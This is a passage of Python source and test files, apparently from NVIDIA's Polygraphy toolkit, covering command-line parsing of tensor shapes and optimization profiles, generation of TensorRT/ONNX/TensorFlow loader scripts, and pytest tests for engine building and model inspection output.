# Allow for quoted strings in shape dimensions
in_quotes = False
buf = ""
for char in shape.lower():
if char in ["\"", "'"]:
in_quotes = not in_quotes
elif not in_quotes and char == SHAPE_SEP:
parsed_shape.append(parse_shape_dim(buf))
buf = ""
else:
buf += char
# For the last dimension
parsed_shape.append(parse_shape_dim(buf))
shape = tuple(parsed_shape)
return shape
name = None
dtype = None
shape = None
if includes_dtype:
dtype = parse_dtype(pop_meta("data type"))
if includes_shape:
shape = parse_shape(pop_meta("shape"))
name = tensor_meta_arg
meta.add(name, dtype, shape)
return meta
# shapes is a TensorMetadata describing the runtime input shapes.
# Returns a list with one (min, opt, max) tuple per profile, where each element is an OrderedDict[str, List[int]].
def parse_profile_shapes(shapes, min_args, opt_args, max_args):
def get_shapes(lst, idx):
default_shapes = copy.copy(shapes)
if idx < len(lst):
default_shapes.update(parse_meta(lst[idx], includes_dtype=False))
# Don't care about dtype, and need to override dynamic dimensions
default_shapes = {name: misc.override_dynamic_shape(shape) for name, (_, shape) in default_shapes.items()}
for name, (_, shape) in shapes.items():
if tuple(default_shapes[name]) != tuple(shape):
G_LOGGER.warning("Input tensor: {:} | For TensorRT profile, overriding shape: {:} to: {:}".format(name, shape, default_shapes[name]), mode=LogMode.ONCE)
return default_shapes
num_profiles = max(len(min_args), len(opt_args), len(max_args))
# For cases where input shapes are provided, we have to generate a profile
if not num_profiles and shapes:
num_profiles = 1
profiles = []
for idx in range(num_profiles):
min_shapes = get_shapes(min_args, idx)
opt_shapes = get_shapes(opt_args, idx)
max_shapes = get_shapes(max_args, idx)
if sorted(min_shapes.keys()) != sorted(opt_shapes.keys()):
G_LOGGER.critical("Mismatch in input names between minimum shapes ({:}) and optimum shapes "
"({:})".format(list(min_shapes.keys()), list(opt_shapes.keys())))
elif sorted(opt_shapes.keys()) != sorted(max_shapes.keys()):
G_LOGGER.critical("Mismatch in input names between optimum shapes ({:}) and maximum shapes "
"({:})".format(list(opt_shapes.keys()), list(max_shapes.keys())))
profiles.append((min_shapes, opt_shapes, max_shapes))
return profiles
def setup_logger(args):
if args.verbose >= 4:
G_LOGGER.severity = G_LOGGER.ULTRA_VERBOSE
elif args.verbose == 3:
G_LOGGER.severity = G_LOGGER.SUPER_VERBOSE
elif args.verbose == 2:
G_LOGGER.severity = G_LOGGER.EXTRA_VERBOSE
elif args.verbose == 1:
G_LOGGER.severity = G_LOGGER.VERBOSE
if args.silent:
G_LOGGER.severity = G_LOGGER.CRITICAL
for fmt in args.log_format:
if fmt == "no-colors":
G_LOGGER.colors = False
elif fmt == "timestamp":
G_LOGGER.timestamp = True
elif fmt == "line-info":
G_LOGGER.line_info = True
def determine_model_type(args):
if get(args, "model_type") is not None:
return args.model_type.lower()
if get(args, "model_file") is None:
return None
def use_ext(ext_mapping):
file_ext = os.path.splitext(args.model_file)[-1]
if file_ext in ext_mapping:
return ext_mapping[file_ext]
if get(args, "ckpt") or os.path.isdir(args.model_file):
return "ckpt"
elif "tf" in args.runners or "trt_legacy" in args.runners:
if args.caffe_model:
return "caffe"
ext_mapping = {".hdf5": "keras", ".uff": "uff", ".prototxt": "caffe", ".onnx": "onnx", ".engine": "engine", ".plan": "engine"}
return use_ext(ext_mapping) or "frozen"
else:
# When no framework is provided, some extensions can be ambiguous
ext_mapping = {".hdf5": "keras", ".graphdef": "frozen", ".onnx": "onnx", ".uff": "uff", ".engine": "engine", ".plan": "engine"}
model_type = use_ext(ext_mapping)
if model_type:
return model_type
G_LOGGER.critical("Could not automatically determine model type for: {:}\n"
"Please explicitly specify the type with the --model-type option".format(
args.model_file))
def setup(args, unknown):
"""
Prepares argument values for use.
"""
def exist(names):
return all([hasattr(args, name) for name in names])
def process_output_arg(name):
arg = get(args, name)
if arg == ["mark", "all"]:
arg = constants.MARK_ALL
setattr(args, name, arg)
if unknown:
G_LOGGER.critical("Unrecognized Options: {:}".format(unknown))
setup_logger(args)
if not exist(["runners"]): # For when no runners are specified
args.runners = []
if get(args, "network_api") and not get(args, "gen_script"):
G_LOGGER.critical("Cannot use the --network-api option if --gen/--gen-script is not being used.")
elif get(args, "network_api") and "trt" not in args.runners:
args.runners.append("trt")
if get(args, "model_file"):
G_LOGGER.verbose("Model: {:}".format(args.model_file))
if not os.path.exists(args.model_file):
G_LOGGER.warning("Model path does not exist: {:}".format(args.model_file))
args.model_file = os.path.abspath(args.model_file)
elif args.runners and get(args, "network_api") is None:
G_LOGGER.critical("One or more runners was specified, but no model file was provided. Make sure you've specified the model path, "
"and also that it's not being consumed as an argument for another parameter")
args.model_type = determine_model_type(args)
if get(args, "inputs"):
args.inputs = parse_meta(args.inputs, includes_dtype=False) # TensorMetadata
else:
args.inputs = TensorMetadata()
if exist(["trt_min_shapes", "trt_opt_shapes", "trt_max_shapes"]):
args.profiles = parse_profile_shapes(args.inputs, args.trt_min_shapes, args.trt_opt_shapes, args.trt_max_shapes)
elif args.inputs:
args.profiles = parse_profile_shapes(args.inputs, [], [], [])
if exist(["workspace"]):
args.workspace = int(args.workspace) if args.workspace is not None else args.workspace
process_output_arg("tf_outputs")
process_output_arg("trt_outputs")
process_output_arg("onnx_outputs")
return args
```
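A simplified, self-contained illustration of the `<name>,<shape>,<dtype>` format accepted by `parse_meta` above; this is not the Polygraphy implementation, it only mirrors the comma and `x` separators and the `auto` placeholder:

```python
def parse_meta_arg(arg):
    """Parse 'name,DxD..xD,dtype', where 'auto' means 'determine from the model' (None here)."""
    def auto_to_none(value):
        return None if value.lower() == "auto" else value

    rest, _, dtype = arg.rpartition(",")
    name, _, shape = rest.rpartition(",")
    shape = auto_to_none(shape)
    dims = tuple(int(d) if d.isdigit() else d for d in shape.split("x")) if shape else None
    return name, dims, auto_to_none(dtype)

print(parse_meta_arg("input0,1x3x224x224,float32"))  # ('input0', (1, 3, 224, 224), 'float32')
print(parse_meta_arg("input1,auto,auto"))            # ('input1', None, None)
```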
#### File: tools/util/misc.py
```python
from polygraphy.tools.util.script import Script, Inline
from polygraphy.tools.util import args as args_util
from polygraphy.logger import G_LOGGER, LogMode
from polygraphy.common import constants
from polygraphy.util import misc
import os
################################# SCRIPT HELPERS #################################
def add_logger_settings(script, args):
# Always required since it is used to print the exit message.
script.append_preimport("from polygraphy.logger import G_LOGGER")
logger_settings = []
verbosity_count = args_util.get(args, "verbose")
if verbosity_count >= 4:
logger_settings.append("G_LOGGER.severity = G_LOGGER.ULTRA_VERBOSE")
elif verbosity_count == 3:
logger_settings.append("G_LOGGER.severity = G_LOGGER.SUPER_VERBOSE")
elif verbosity_count == 2:
logger_settings.append("G_LOGGER.severity = G_LOGGER.EXTRA_VERBOSE")
elif verbosity_count == 1:
logger_settings.append("G_LOGGER.severity = G_LOGGER.VERBOSE")
if args_util.get(args, "silent"):
logger_settings.append("G_LOGGER.severity = G_LOGGER.CRITICAL")
log_format = misc.default_value(args_util.get(args, "log_format"), [])
for fmt in args.log_format:
if fmt == "no-colors":
logger_settings.append("G_LOGGER.colors = False")
elif fmt == "timestamp":
logger_settings.append("G_LOGGER.timestamp = True")
elif fmt == "line-info":
logger_settings.append("G_LOGGER.line_info = True")
for setting in logger_settings:
script.append_preimport(setting)
def _get_outputs_arg(script, args, name):
outputs = args_util.get(args, name)
if outputs == constants.MARK_ALL:
outputs = Inline("constants.MARK_ALL")
script.add_import(["constants"], frm="polygraphy.common")
return outputs
def add_tf_loader(script, args, disable_outputs=None, suffix=None):
if disable_outputs:
outputs = None
else:
outputs = _get_outputs_arg(script, args, "tf_outputs")
model_file = args_util.get(args, "model_file")
model_type = args_util.get(args, "model_type")
save_pb = args_util.get(args, "save_pb")
save_tensorboard = args_util.get(args, "save_tensorboard")
if model_type == "ckpt":
G_LOGGER.verbose("Loading a TensorFlow checkpoint. Please ensure you are not using the --use-subprocess flag".format(model_file), mode=LogMode.ONCE)
script.add_import(imports=["GraphFromCkpt"], frm="polygraphy.backend.tf")
loader_id = "load_ckpt"
loader_str = Script.invoke("GraphFromCkpt", model_file, args_util.get(args, "ckpt"))
elif model_type == "keras":
script.add_import(imports=["GraphFromKeras"], frm="polygraphy.backend.tf")
loader_id = "load_keras"
loader_str = Script.invoke("GraphFromKeras", model_file)
else:
script.add_import(imports=["GraphFromFrozen"], frm="polygraphy.backend.tf")
G_LOGGER.verbose("Attempting to load as a frozen graph. If this is not correct, please specify --model-type", mode=LogMode.ONCE)
loader_id = "load_frozen"
loader_str = Script.invoke("GraphFromFrozen", model_file)
loader_name = script.add_loader(loader_str, loader_id, suffix=suffix)
if args_util.get(args, "freeze_graph"):
script.add_import(imports=["OptimizeGraph"], frm="polygraphy.backend.tf")
loader_name = script.add_loader(Script.invoke("OptimizeGraph", loader_name), "optimize_graph", suffix=suffix)
if args_util.get(args, "tftrt"):
script.add_import(imports=["UseTfTrt"], frm="polygraphy.backend.tf")
loader_str = Script.invoke("UseTfTrt", loader_name, max_workspace_size=args_util.get(args, "workspace"), fp16=args_util.get(args, "fp16"), int8=args_util.get(args, "int8"),
max_batch_size=args_util.get(args, "batch_size"), is_dynamic_op=args_util.get(args, "dynamic_op"), minimum_segment_size=args_util.get(args, "minimum_segment_size"))
loader_name = script.add_loader(loader_str, "use_tftrt", suffix=suffix)
MODIFY_TF = "ModifyGraph"
modify_tf_str = Script.invoke(MODIFY_TF, loader_name, outputs=outputs)
if modify_tf_str != Script.invoke(MODIFY_TF, loader_name):
script.add_import(imports=[MODIFY_TF], frm="polygraphy.backend.tf")
loader_name = script.add_loader(modify_tf_str, "modify_tf")
engine_dir = None
if args_util.get(args, "tftrt"):
engine_dir = args_util.get(args, "save_engine")
WRITE_TF = "SaveGraph"
write_tf_str = Script.invoke(WRITE_TF, loader_name, path=save_pb, tensorboard_dir=save_tensorboard, engine_dir=engine_dir)
if write_tf_str != Script.invoke(WRITE_TF, loader_name):
script.add_import(imports=[WRITE_TF], frm="polygraphy.backend.tf")
loader_name = script.add_loader(write_tf_str, "save_tf")
return loader_name
def add_tf_config_loader(script, args):
config_loader_str = Script.invoke_if_nondefault("CreateConfig", gpu_memory_fraction=args_util.get(args, "gpu_memory_fraction"),
allow_growth=args_util.get(args, "allow_growth"), use_xla=args_util.get(args, "xla"))
if config_loader_str is not None:
script.add_import(imports=["CreateConfig"], frm="polygraphy.backend.tf")
config_loader_name = script.add_loader(config_loader_str, "create_tf_config")
else:
config_loader_name = None
return config_loader_name
def get_modify_onnx_str(script, args, loader_name, disable_outputs=None):
if disable_outputs:
outputs = None
exclude_outputs = None
else:
outputs = _get_outputs_arg(script, args, "onnx_outputs")
exclude_outputs = args_util.get(args, "onnx_exclude_outputs")
if hasattr(args, "shape_inference"):
do_shape_inference = args_util.get(args, "shape_inference")
else:
do_shape_inference = None if args_util.get(args, "no_shape_inference") else True
MODIFY_ONNX = "ModifyOnnx"
modify_onnx_str = Script.invoke(MODIFY_ONNX, loader_name, do_shape_inference=do_shape_inference,
outputs=outputs, exclude_outputs=exclude_outputs)
if modify_onnx_str != Script.invoke(MODIFY_ONNX, loader_name):
script.add_import(imports=[MODIFY_ONNX], frm="polygraphy.backend.onnx")
return modify_onnx_str
return None
def add_onnx_loader(script, args, disable_outputs=None, suffix=None):
if args_util.get(args, "model_type") == "onnx":
script.add_import(imports=["OnnxFromPath"], frm="polygraphy.backend.onnx")
loader_str = Script.invoke("OnnxFromPath", args_util.get(args, "model_file"))
loader_name = script.add_loader(loader_str, "load_onnx", suffix=suffix)
else:
G_LOGGER.verbose("Attempting to load as a TensorFlow model, using TF2ONNX to convert to ONNX. "
"If this is not correct, please specify --model-type", mode=LogMode.ONCE)
script.add_import(imports=["OnnxFromTfGraph"], frm="polygraphy.backend.onnx")
loader_str = Script.invoke("OnnxFromTfGraph", add_tf_loader(script, args, disable_outputs=True, suffix=suffix),
opset=args_util.get(args, "opset"), fold_constant=False if args_util.get(args, "no_const_folding") else None)
loader_name = script.add_loader(loader_str, "export_onnx_from_tf", suffix=suffix)
modify_onnx_str = get_modify_onnx_str(script, args, loader_name, disable_outputs=disable_outputs)
if modify_onnx_str is not None:
loader_name = script.add_loader(modify_onnx_str, "modify_onnx")
save_onnx = args_util.get(args, "save_onnx")
SAVE_ONNX = "SaveOnnx"
save_onnx_str = Script.invoke(SAVE_ONNX, loader_name, path=save_onnx)
if save_onnx_str != Script.invoke(SAVE_ONNX, loader_name):
script.add_import(imports=[SAVE_ONNX], frm="polygraphy.backend.onnx")
loader_name = script.add_loader(save_onnx_str, "save_onnx")
return loader_name
def add_serialized_onnx_loader(script, args, disable_outputs=None):
model_file = args_util.get(args, "model_file")
needs_modify = get_modify_onnx_str(script, args, "check_needs_modify", disable_outputs) is not None
should_import_raw = args_util.get(args, "model_type") == "onnx" and not needs_modify
if should_import_raw:
script.add_import(imports=["BytesFromPath"], frm="polygraphy.backend.common")
onnx_loader = script.add_loader(Script.invoke("BytesFromPath", model_file), "load_serialized_onnx")
else:
script.add_import(imports=["BytesFromOnnx"], frm="polygraphy.backend.onnx")
onnx_loader = add_onnx_loader(script, args, disable_outputs=disable_outputs)
onnx_loader = script.add_loader(Script.invoke("BytesFromOnnx", onnx_loader), "serialize_onnx")
return onnx_loader
# If plugins are present, wrap the provided loader/object with LoadPlugins
def _wrap_if_plugins(script, args, obj_name):
plugins = args_util.get(args, "plugins")
if plugins:
script.add_import(imports=["LoadPlugins"], frm="polygraphy.backend.trt")
loader_str = Script.invoke("LoadPlugins", obj_name, plugins=plugins)
obj_name = script.add_loader(loader_str, "load_plugins")
return obj_name
def add_trt_network_loader(script, args):
model_file = args_util.get(args, "model_file")
outputs = _get_outputs_arg(script, args, "trt_outputs")
if args_util.get(args, "network_api"):
CREATE_NETWORK_FUNC = Inline("create_network")
script.add_import(imports=["CreateNetwork"], frm="polygraphy.backend.trt")
script.add_import(imports=["extend"], frm="polygraphy.common.func")
script.append_prefix("# Manual TensorRT network creation")
script.append_prefix("@extend(CreateNetwork())")
script.append_prefix("def {:}(builder, network):".format(CREATE_NETWORK_FUNC))
script.append_prefix("{tab}import tensorrt as trt\n".format(tab=constants.TAB))
script.append_prefix("{tab}# Define your network here. Make sure to mark outputs!".format(tab=constants.TAB))
net_inputs = args_util.get(args, "inputs")
if net_inputs:
for name, (dtype, shape) in net_inputs.items():
script.append_prefix("{tab}{name} = network.add_input(name='{name}', shape={shape}, dtype=trt.float32) # TODO: Set dtype".format(
name=name, shape=shape, tab=constants.TAB))
script.append_prefix("{tab}# TODO: network.mark_output(...)\n".format(tab=constants.TAB))
return CREATE_NETWORK_FUNC
if args_util.get(args, "ext"):
script.add_import(imports=["NetworkFromOnnxPath"], frm="polygraphy.backend.trt")
loader_str = Script.invoke("NetworkFromOnnxPath", _wrap_if_plugins(script, args, model_file), explicit_precision=args_util.get(args, "explicit_precision"))
loader_name = script.add_loader(loader_str, "parse_network_from_onnx")
else:
script.add_import(imports=["NetworkFromOnnxBytes"], frm="polygraphy.backend.trt")
onnx_loader = add_serialized_onnx_loader(script, args, disable_outputs=True)
loader_str = Script.invoke("NetworkFromOnnxBytes", _wrap_if_plugins(script, args, onnx_loader), explicit_precision=args_util.get(args, "explicit_precision"))
loader_name = script.add_loader(loader_str, "parse_network_from_onnx")
MODIFY_NETWORK = "ModifyNetwork"
modify_network_str = Script.invoke(MODIFY_NETWORK, loader_name, outputs=outputs, exclude_outputs=args_util.get(args, "trt_exclude_outputs"))
if modify_network_str != Script.invoke(MODIFY_NETWORK, loader_name):
script.add_import(imports=[MODIFY_NETWORK], frm="polygraphy.backend.trt")
loader_name = script.add_loader(modify_network_str, "modify_network")
return loader_name
def add_trt_config_loader(script, args, data_loader_name):
profiles = []
for (min_shape, opt_shape, max_shape) in args_util.get(args, "profiles"):
profile_str = "Profile()"
for name in min_shape.keys():
profile_str += Script.format_str(".add({:}, min={:}, opt={:}, max={:})", name, min_shape[name], opt_shape[name], max_shape[name])
profiles.append(Inline(profile_str))
if profiles:
script.add_import(imports=["Profile"], frm="polygraphy.backend.trt")
sep = Inline("\n{:}".format(constants.TAB))
profiles = Script.format_str("[{:}{:}\n]", sep, Inline((",{:}".format(sep)).join(profiles)))
profile_name = script.add_loader(profiles, "profiles")
else:
profile_name = None
calibrator = None
if args_util.get(args, "int8"):
script.add_import(imports=["DataLoader"], frm="polygraphy.comparator")
script.add_import(imports=["Calibrator"], frm="polygraphy.backend.trt")
calibrator = Script.invoke("Calibrator", data_loader=Inline(data_loader_name) if data_loader_name else Inline("DataLoader()"),
cache=args_util.get(args, "calibration_cache"))
config_loader_str = Script.invoke_if_nondefault("CreateTrtConfig", max_workspace_size=args_util.get(args, "workspace"), tf32=args_util.get(args, "tf32"),
fp16=args_util.get(args, "fp16"), int8=args_util.get(args, "int8"), strict_types=args_util.get(args, "strict_types"),
profiles=profile_name, calibrator=Inline(calibrator) if calibrator else None)
if config_loader_str is not None:
script.add_import(imports=["CreateConfig as CreateTrtConfig"], frm="polygraphy.backend.trt")
config_loader_name = script.add_loader(config_loader_str, "create_trt_config")
else:
config_loader_name = None
return config_loader_name
def add_trt_serialized_engine_loader(script, args):
script.add_import(imports=["EngineFromBytes"], frm="polygraphy.backend.trt")
script.add_import(imports=["BytesFromPath"], frm="polygraphy.backend.common")
load_engine = script.add_loader(Script.invoke("BytesFromPath", args_util.get(args, "model_file")), "load_engine")
return script.add_loader(Script.invoke("EngineFromBytes", _wrap_if_plugins(script, args, load_engine)), "deserialize_engine")
def add_data_loader(script, args):
def omit_none_tuple(tup):
if all([elem is None for elem in tup]):
return None
return tup
int_range = omit_none_tuple(tup=(args_util.get(args, "int_min"), args_util.get(args, "int_max")))
float_range = omit_none_tuple(tup=(args_util.get(args, "float_min"), args_util.get(args, "float_max")))
input_metadata_str = Inline(repr(args_util.get(args, "inputs"))) if args_util.get(args, "inputs") else None
if input_metadata_str:
script.add_import(imports=["TensorMetadata"], frm="polygraphy.common")
data_loader = Script.invoke_if_nondefault("DataLoader", seed=args_util.get(args, "seed"), iterations=args_util.get(args, "iterations"),
input_metadata=input_metadata_str, int_range=int_range, float_range=float_range)
if data_loader is not None:
data_loader_name = Inline("data_loader")
script.add_import(imports=["DataLoader"], frm="polygraphy.comparator")
script.append_prefix(Script.format_str("\n# Inference Inputs Loader\n{:} = {:}\n", data_loader_name, Inline(data_loader)))
else:
data_loader_name = None
return data_loader_name
################################# PYTHON HELPERS #################################
def get_tf_model_loader(args):
script = Script()
loader_name = add_tf_loader(script, args)
exec(str(script), globals(), locals())
return locals()[loader_name]
def get_onnx_model_loader(args):
script = Script()
loader_name = add_onnx_loader(script, args)
exec(str(script), globals(), locals())
return locals()[loader_name]
def get_trt_network_loader(args):
script = Script()
loader_name = add_trt_network_loader(script, args)
exec(str(script), globals(), locals())
return locals()[loader_name]
def get_trt_config_loader(args, data_loader):
script = Script()
loader_name = add_trt_config_loader(script, args, data_loader_name="data_loader")
exec(str(script), globals(), locals())
return locals()[loader_name]
def get_trt_serialized_engine_loader(args):
script = Script()
loader_name = add_trt_serialized_engine_loader(script, args)
exec(str(script), globals(), locals())
return locals()[loader_name]
def get_data_loader(args):
script = Script()
data_loader_name = add_data_loader(script, args)
if data_loader_name is None: # All arguments are default
from polygraphy.comparator import DataLoader
return DataLoader()
exec(str(script), globals(), locals())
return locals()[data_loader_name]
```
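The `get_*_loader` helpers above all rely on the same trick: render a script to text, `exec` it, and pull the resulting loader object out of `locals()`. A stripped-down sketch of that pattern with hand-written script text (the real `Script` class assembles this text from the parsed command-line arguments):

```python
# Hypothetical stand-in for the generated script body.
script_text = "\n".join([
    "def load_model():",
    "    return 'dummy-model'",
])
loader_name = "load_model"

exec(script_text, globals(), locals())  # defines load_model at module scope
loader = locals()[loader_name]
print(loader())  # dummy-model
```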
#### File: backend/trt/test_loader.py
```python
from polygraphy.backend.trt import EngineFromBytes, EngineFromNetwork, CreateConfig, NetworkFromOnnxBytes, NetworkFromOnnxPath, ModifyNetwork, Calibrator, Profile, SaveEngine, LoadPlugins
from polygraphy.backend.trt import util as trt_util
from polygraphy.common import PolygraphyException, constants
from polygraphy.comparator import DataLoader
from tests.models.meta import ONNX_MODELS
from tests.common import version, check_file_non_empty
import tensorrt as trt
import numpy as np
import tempfile
import pytest
import os
@pytest.fixture(scope="session")
def identity_engine():
network_loader = NetworkFromOnnxBytes(ONNX_MODELS["identity"].loader)
engine_loader = EngineFromNetwork(network_loader, CreateConfig())
with engine_loader() as engine:
yield engine
@pytest.fixture(scope="session")
def identity_builder_network():
builder, network, parser = NetworkFromOnnxBytes(ONNX_MODELS["identity"].loader)()
with builder, network, parser:
yield builder, network
@pytest.fixture(scope="session")
def load_identity():
return NetworkFromOnnxBytes(ONNX_MODELS["identity"].loader)
@pytest.fixture(scope="session")
def load_identity_identity():
return NetworkFromOnnxBytes(ONNX_MODELS["identity_identity"].loader)
class TestLoadPlugins(object):
def test_can_load_libnvinfer_plugins(self):
def get_plugin_names():
return [pc.name for pc in trt.get_plugin_registry().plugin_creator_list]
loader = LoadPlugins(plugins=["libnvinfer_plugin.so"])
loader()
assert get_plugin_names()
class TestSerializedEngineLoader(object):
def test_serialized_engine_loader_from_lambda(self, identity_engine):
with tempfile.NamedTemporaryFile() as outpath:
with open(outpath.name, "wb") as f:
f.write(identity_engine.serialize())
loader = EngineFromBytes(lambda: open(outpath.name, "rb").read())
with loader() as engine:
assert isinstance(engine, trt.ICudaEngine)
def test_serialized_engine_loader_from_buffer(self, identity_engine):
loader = EngineFromBytes(identity_engine.serialize())
with loader() as engine:
assert isinstance(engine, trt.ICudaEngine)
class TestOnnxNetworkLoader(object):
def test_loader(self):
builder, network, parser = NetworkFromOnnxBytes(ONNX_MODELS["identity"].loader)()
with builder, network, parser:
assert not network.has_implicit_batch_dimension
assert not network.has_explicit_precision
def test_loader_explicit_precision(self):
builder, network, parser = NetworkFromOnnxBytes(ONNX_MODELS["identity"].loader, explicit_precision=True)()
with builder, network, parser:
assert not network.has_implicit_batch_dimension
assert network.has_explicit_precision
@pytest.mark.skipif(version(trt.__version__) < version("7.1.0.0"), reason="API was added in TRT 7.1")
class TestNetworkFromOnnxPath(object):
def test_loader(self):
builder, network, parser = NetworkFromOnnxPath(ONNX_MODELS["identity"].path)()
with builder, network, parser:
assert not network.has_implicit_batch_dimension
assert not network.has_explicit_precision
def test_loader_explicit_precision(self):
builder, network, parser = NetworkFromOnnxPath(ONNX_MODELS["identity"].path, explicit_precision=True)()
with builder, network, parser:
assert not network.has_implicit_batch_dimension
assert network.has_explicit_precision
class TestModifyNetwork(object):
def test_layerwise(self, load_identity_identity):
load_network = ModifyNetwork(load_identity_identity, outputs=constants.MARK_ALL)
builder, network, parser = load_network()
with builder, network, parser:
for layer in network:
for index in range(layer.num_outputs):
assert layer.get_output(index).is_network_output
def test_custom_outputs(self, load_identity_identity):
builder, network, parser = ModifyNetwork(load_identity_identity, outputs=["identity_out_0"])()
with builder, network, parser:
assert network.num_outputs == 1
assert network.get_output(0).name == "identity_out_0"
def test_exclude_outputs_with_layerwise(self, load_identity_identity):
builder, network, parser = ModifyNetwork(load_identity_identity, outputs=constants.MARK_ALL, exclude_outputs=["identity_out_2"])()
with builder, network, parser:
assert network.num_outputs == 1
assert network.get_output(0).name == "identity_out_0"
class TestProfile(object):
def test_can_add(self):
profile = Profile()
min, opt, max = (1, 1), (2, 2), (4, 4)
profile.add("input", min=min, opt=opt, max=max)
shape_tuple = profile["input"]
assert shape_tuple.min == min
assert shape_tuple.opt == opt
assert shape_tuple.max == max
class TestConfigLoader(object):
def test_defaults(self, identity_builder_network):
builder, network = identity_builder_network
loader = CreateConfig()
config = loader(builder, network)
assert config.max_workspace_size == 1 << 24
if version(trt.__version__) > version("7.1.0.0"):
assert not config.get_flag(trt.BuilderFlag.TF32)
assert not config.get_flag(trt.BuilderFlag.FP16)
assert not config.get_flag(trt.BuilderFlag.INT8)
assert config.num_optimization_profiles == 1
assert config.int8_calibrator is None
def test_workspace_size(self, identity_builder_network):
builder, network = identity_builder_network
loader = CreateConfig(max_workspace_size=0)
config = loader(builder, network)
assert config.max_workspace_size == 0
@pytest.mark.parametrize("flag", [True, False])
def test_strict_types(self, identity_builder_network, flag):
builder, network = identity_builder_network
loader = CreateConfig(strict_types=flag)
config = loader(builder, network)
assert config.get_flag(trt.BuilderFlag.STRICT_TYPES) == flag
@pytest.mark.parametrize("flag", [True, False])
def test_tf32(self, identity_builder_network, flag):
builder, network = identity_builder_network
loader = CreateConfig(tf32=flag)
config = loader(builder, network)
if version(trt.__version__) > version("7.1.0.0"):
assert config.get_flag(trt.BuilderFlag.TF32) == flag
@pytest.mark.parametrize("flag", [True, False])
def test_fp16(self, identity_builder_network, flag):
builder, network = identity_builder_network
loader = CreateConfig(fp16=flag)
config = loader(builder, network)
assert config.get_flag(trt.BuilderFlag.FP16) == flag
@pytest.mark.parametrize("flag", [True, False])
def test_int8(self, identity_builder_network, flag):
builder, network = identity_builder_network
loader = CreateConfig(int8=flag)
config = loader(builder, network)
assert config.get_flag(trt.BuilderFlag.INT8) == flag
def test_calibrator_metadata_set(self, identity_builder_network):
builder, network = identity_builder_network
calibrator = Calibrator(DataLoader())
loader = CreateConfig(int8=True, calibrator=calibrator)
config = loader(builder, network)
assert config.int8_calibrator
assert "x" in calibrator.data_loader.input_metadata
def test_multiple_profiles(self, identity_builder_network):
builder, network = identity_builder_network
profiles = [
Profile().add("x", (1, 2, 1, 1), (1, 2, 2, 2), (1, 2, 4, 4)),
Profile().add("x", (1, 2, 4, 4), (1, 2, 8, 8), (1, 2, 16, 16)),
]
loader = CreateConfig(profiles=profiles)
config = loader(builder, network)
assert config.num_optimization_profiles == 2
class TestEngineFromNetwork(object):
def test_can_build_with_parser_owning(self):
loader = EngineFromNetwork(NetworkFromOnnxBytes(ONNX_MODELS["identity"].loader))
with loader():
pass
def test_can_build_without_parser_non_owning(self, identity_builder_network):
builder, network = identity_builder_network
loader = EngineFromNetwork((builder, network))
with loader():
pass
def test_can_build_with_calibrator(self, identity_builder_network):
builder, network = identity_builder_network
calibrator = Calibrator(DataLoader())
create_config = CreateConfig(int8=True, calibrator=calibrator)
loader = EngineFromNetwork((builder, network), create_config)
with loader():
pass
# Calibrator buffers should be freed after the build
assert all([buf.allocated_nbytes == 0 for buf in calibrator.device_buffers.values()])
class TestSaveEngine(object):
def test_save_engine(self, load_identity):
with tempfile.NamedTemporaryFile() as outpath:
engine_loader = SaveEngine(EngineFromNetwork(load_identity), path=outpath.name)
with engine_loader() as engine:
check_file_non_empty(outpath.name)
```
#### File: tests/tools/test_inspect.py
```python
import copy
import glob
import os
import subprocess as sp
import sys
import tempfile
from textwrap import dedent
import pytest
from polygraphy.logger import G_LOGGER
from polygraphy.util import misc
from tests.common import check_file_non_empty, version
from tests.models.meta import ONNX_MODELS, TF_MODELS
from tests.tools.common import (run_polygraphy_inspect, run_polygraphy_run,
run_subtool)
#
# INSPECT MODEL
#
@pytest.fixture(scope="module", params=["none", "basic", "attrs", "full"])
def run_inspect_model(request):
yield lambda additional_opts: run_polygraphy_inspect(["model"] + ["--mode={:}".format(request.param)] + additional_opts)
# ONNX cases
ONNX_CASES = [
["identity", "none",
"""
[I] ==== ONNX Model ====
Name: test_identity | Opset: 8
---- 1 Graph Inputs ----
{x [dtype=float32, shape=(1, 1, 2, 2)]}
---- 1 Graph Outputs ----
{y [dtype=float32, shape=(1, 1, 2, 2)]}
---- 0 Initializers ----
(Use --mode to display)
---- 1 Nodes ----
(Use --mode to display)
"""
],
["identity", "basic",
"""
[I] ==== ONNX Model ====
Name: test_identity | Opset: 8
---- 1 Graph Inputs ----
{x [dtype=float32, shape=(1, 1, 2, 2)]}
---- 1 Graph Outputs ----
{y [dtype=float32, shape=(1, 1, 2, 2)]}
---- 0 Initializers ----
{}
---- 1 Nodes ----
Node 0 | [Op: Identity]
{x [dtype=float32, shape=(1, 1, 2, 2)]}
-> {y [dtype=float32, shape=(1, 1, 2, 2)]}
"""
],
["identity_with_initializer", "basic",
"""
[I] ==== ONNX Model ====
Name: onnx_graphsurgeon | Opset: 11
---- 0 Graph Inputs ----
{}
---- 1 Graph Outputs ----
{Y [dtype=float32, shape=(2, 2)]}
---- 1 Initializers ----
{X [dtype=float32, shape=(2, 2)]}
---- 1 Nodes ----
Node 0 | [Op: Identity]
{Initializer | X [dtype=float32, shape=(2, 2)]}
-> {Y [dtype=float32, shape=(2, 2)]}
"""
],
["identity_with_initializer", "full",
"""
[I] ==== ONNX Model ====
Name: onnx_graphsurgeon | Opset: 11
---- 0 Graph Inputs ----
{}
---- 1 Graph Outputs ----
{Y [dtype=float32, shape=(2, 2)]}
---- 1 Initializers ----
Initializer | X [dtype=float32, shape=[2, 2]] | Values:
[[1. 1.]
[1. 1.]]
---- 1 Nodes ----
Node 0 | [Op: Identity]
{Initializer | X [dtype=float32, shape=(2, 2)]}
-> {Y [dtype=float32, shape=(2, 2)]}
"""
],
["tensor_attr", "basic",
"""
[I] ==== ONNX Model ====
Name: onnx_graphsurgeon | Opset: 11
---- 0 Graph Inputs ----
{}
---- 1 Graph Outputs ----
{const_out [dtype=float32, shape=(14, 14)]}
---- 0 Initializers ----
{}
---- 1 Nodes ----
Node 0 | [Op: Constant]
{} -> {const_out [dtype=float32, shape=(14, 14)]}
"""
],
["tensor_attr", "attrs",
"""
[I] ==== ONNX Model ====
Name: onnx_graphsurgeon | Opset: 11
---- 0 Graph Inputs ----
{}
---- 1 Graph Outputs ----
{const_out [dtype=float32, shape=(14, 14)]}
---- 0 Initializers ----
{}
---- 1 Nodes ----
Node 0 | [Op: Constant]
{} -> {const_out [dtype=float32, shape=(14, 14)]}
---- Attributes ----
value = Tensor: [dtype=float32, shape=[14, 14]]
"""
],
["tensor_attr", "full",
"""
[I] ==== ONNX Model ====
